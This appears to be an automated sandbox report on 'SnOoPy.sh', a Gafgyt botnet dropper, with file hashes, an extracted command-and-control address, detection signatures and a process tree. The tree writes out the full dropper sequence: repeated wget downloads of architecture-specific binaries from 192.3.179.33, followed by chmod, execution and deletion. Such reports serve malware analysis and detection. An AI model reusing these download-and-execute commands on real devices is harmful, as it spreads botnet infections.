Analysis
-
max time kernel
3s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
03-12-2024 22:16
Static task
static1
Behavioral task
behavioral1
Sample
SnOoPy.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
SnOoPy.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
SnOoPy.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
SnOoPy.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
SnOoPy.sh
-
Size
2KB
-
MD5
8ea1e7d08dd0cf52bbdddc3222e9b8af
-
SHA1
f031a227d961d83fc0083c4b5b7b4ccdfe64e711
-
SHA256
2884954c3ee63cc245def342b3946b24b0aa2cbaebf7d6b2c5a8fd009760a469
-
SHA512
1be9d8a04c9b95e9e07c6fad4ae90a160219b05d0bf4b77578ac7dee91b5f336688ac792aab88cc78b5923963e1c9bacf8c0407fc22119041e9def0f217800da
Malware Config
Extracted
gafgyt
192.3.179.33:23
Signatures
-
Detected Gafgyt variant 1 IoCs
resource yara_rule behavioral1/files/fstream-1.dat family_gafgyt -
Gafgyt family
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1498 chmod 1531 chmod 1539 chmod 1543 chmod 1484 chmod 1502 chmod 1506 chmod 1511 chmod 1515 chmod 1519 chmod 1535 chmod 1547 chmod 1477 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/a-r.m-6.SNOOPY 1507 a-r.m-6.SNOOPY -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/a-r.m-6.SNOOPY wget
Processes
-
/tmp/SnOoPy.sh/tmp/SnOoPy.sh1⤵PID:1475
-
/usr/bin/wgetwget http://192.3.179.33/m-i.p-s.SNOOPY2⤵PID:1476
-
-
/bin/chmodchmod +x m-i.p-s.SNOOPY2⤵
- File and Directory Permissions Modification
PID:1477
-
-
/tmp/m-i.p-s.SNOOPY./m-i.p-s.SNOOPY2⤵PID:1478
-
-
/bin/rmrm -rf m-i.p-s.SNOOPY2⤵PID:1479
-
-
/usr/bin/wgetwget http://192.3.179.33/m-p.s-l.SNOOPY2⤵PID:1480
-
-
/bin/chmodchmod +x m-p.s-l.SNOOPY2⤵
- File and Directory Permissions Modification
PID:1484
-
-
/tmp/m-p.s-l.SNOOPY./m-p.s-l.SNOOPY2⤵PID:1487
-
-
/bin/rmrm -rf m-p.s-l.SNOOPY2⤵PID:1488
-
-
/usr/bin/wgetwget http://192.3.179.33/s-h.4-.SNOOPY2⤵PID:1490
-
-
/bin/chmodchmod +x s-h.4-.SNOOPY2⤵
- File and Directory Permissions Modification
PID:1498
-
-
/tmp/s-h.4-.SNOOPY./s-h.4-.SNOOPY2⤵PID:1499
-
-
/bin/rmrm -rf s-h.4-.SNOOPY2⤵PID:1500
-
-
/usr/bin/wgetwget http://192.3.179.33/x-8.6-.SNOOPY2⤵PID:1501
-
-
/bin/chmodchmod +x x-8.6-.SNOOPY2⤵
- File and Directory Permissions Modification
PID:1502
-
-
/tmp/x-8.6-.SNOOPY./x-8.6-.SNOOPY2⤵PID:1503
-
-
/bin/rmrm -rf x-8.6-.SNOOPY2⤵PID:1504
-
-
/usr/bin/wgetwget http://192.3.179.33/a-r.m-6.SNOOPY2⤵
- Writes file to tmp directory
PID:1505
-
-
/bin/chmodchmod +x a-r.m-6.SNOOPY2⤵
- File and Directory Permissions Modification
PID:1506
-
-
/tmp/a-r.m-6.SNOOPY./a-r.m-6.SNOOPY2⤵
- Executes dropped EXE
PID:1507
-
-
/bin/rmrm -rf a-r.m-6.SNOOPY2⤵PID:1509
-
-
/usr/bin/wgetwget http://192.3.179.33/x-3.2-.SNOOPY2⤵PID:1510
-
-
/bin/chmodchmod +x x-3.2-.SNOOPY2⤵
- File and Directory Permissions Modification
PID:1511
-
-
/tmp/x-3.2-.SNOOPY./x-3.2-.SNOOPY2⤵PID:1512
-
-
/bin/rmrm -rf x-3.2-.SNOOPY2⤵PID:1513
-
-
/usr/bin/wgetwget http://192.3.179.33/a-r.m-7.SNOOPY2⤵PID:1514
-
-
/bin/chmodchmod +x a-r.m-7.SNOOPY2⤵
- File and Directory Permissions Modification
PID:1515
-
-
/tmp/a-r.m-7.SNOOPY./a-r.m-7.SNOOPY2⤵PID:1516
-
-
/bin/rmrm -rf a-r.m-7.SNOOPY2⤵PID:1517
-
-
/usr/bin/wgetwget http://192.3.179.33/p-p.c-.SNOOPY2⤵PID:1518
-
-
/bin/chmodchmod +x p-p.c-.SNOOPY2⤵
- File and Directory Permissions Modification
PID:1519
-
-
/tmp/p-p.c-.SNOOPY./p-p.c-.SNOOPY2⤵PID:1520
-
-
/bin/rmrm -rf p-p.c-.SNOOPY2⤵PID:1521
-
-
/usr/bin/wgetwget http://192.3.179.33/i-5.8-6.SNOOPY2⤵PID:1522
-
-
/bin/chmodchmod +x i-5.8-6.SNOOPY2⤵
- File and Directory Permissions Modification
PID:1531
-
-
/tmp/i-5.8-6.SNOOPY./i-5.8-6.SNOOPY2⤵PID:1532
-
-
/bin/rmrm -rf i-5.8-6.SNOOPY2⤵PID:1533
-
-
/usr/bin/wgetwget http://192.3.179.33/m-6.8-k.SNOOPY2⤵PID:1534
-
-
/bin/chmodchmod +x m-6.8-k.SNOOPY2⤵
- File and Directory Permissions Modification
PID:1535
-
-
/tmp/m-6.8-k.SNOOPY./m-6.8-k.SNOOPY2⤵PID:1536
-
-
/bin/rmrm -rf m-6.8-k.SNOOPY2⤵PID:1537
-
-
/usr/bin/wgetwget http://192.3.179.33/p-p.c-.SNOOPY2⤵PID:1538
-
-
/bin/chmodchmod +x p-p.c-.SNOOPY2⤵
- File and Directory Permissions Modification
PID:1539
-
-
/tmp/p-p.c-.SNOOPY./p-p.c-.SNOOPY2⤵PID:1540
-
-
/bin/rmrm -rf p-p.c-.SNOOPY2⤵PID:1541
-
-
/usr/bin/wgetwget http://192.3.179.33/a-r.m-4.SNOOPY2⤵PID:1542
-
-
/bin/chmodchmod +x a-r.m-4.SNOOPY2⤵
- File and Directory Permissions Modification
PID:1543
-
-
/tmp/a-r.m-4.SNOOPY./a-r.m-4.SNOOPY2⤵PID:1544
-
-
/bin/rmrm -rf a-r.m-4.SNOOPY2⤵PID:1545
-
-
/usr/bin/wgetwget http://192.3.179.33/a-r.m-5.SNOOPY2⤵PID:1546
-
-
/bin/chmodchmod +x a-r.m-5.SNOOPY2⤵
- File and Directory Permissions Modification
PID:1547
-
-
/tmp/a-r.m-5.SNOOPY./a-r.m-5.SNOOPY2⤵PID:1548
-
-
/bin/rmrm -rf a-r.m-5.SNOOPY2⤵PID:1549
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
108KB
MD5d99e614a76b1b6b63030556a22cf2881
SHA11cc0cc981f07d648722bc0b112da2d697858558f
SHA2566bcf634cf08615de9c4f5759bcc2523b114db64a67ed3c119c7aa4230be0b0b5
SHA51219585dae9db8f913f809da6644127b064b03ec2156fe482b87feb803c8facb291da0b951336c7bc13cef6af1a032229f8f18511b09531a2ad3dce4f53bb8051f